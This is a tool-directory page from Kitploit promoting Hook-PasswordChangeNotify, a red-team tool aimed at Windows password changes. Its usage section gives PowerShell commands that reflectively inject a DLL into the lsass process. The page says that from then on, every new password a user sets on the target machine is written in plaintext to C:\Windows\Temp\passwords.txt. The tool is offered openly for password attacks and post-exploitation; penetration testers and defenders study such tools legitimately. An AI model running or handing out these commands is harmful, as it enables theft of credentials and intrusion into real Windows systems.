Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Hook-PasswordChangeNotify — Hook PasswordChangeNotify | Kitploit
Tools/GitHubGitHub/al1ex/hook-passwordchangenotify
Password AttacksLateral MovementPost-ExploitationPenetration TestingRed Teaming
GitHubal1ex/hook-passwordchangenotify

Hook-PasswordChangeNotify

Hook PasswordChangeNotify

View Repository
1155 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Hook-PasswordChangeNotify

  1. Execute the following command in PowerShell:
root@kitploit:~
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
  1. When a user on the target machine changes their password, the new password will be written to C:\Windows\Temp\passwords.txt
Download Tool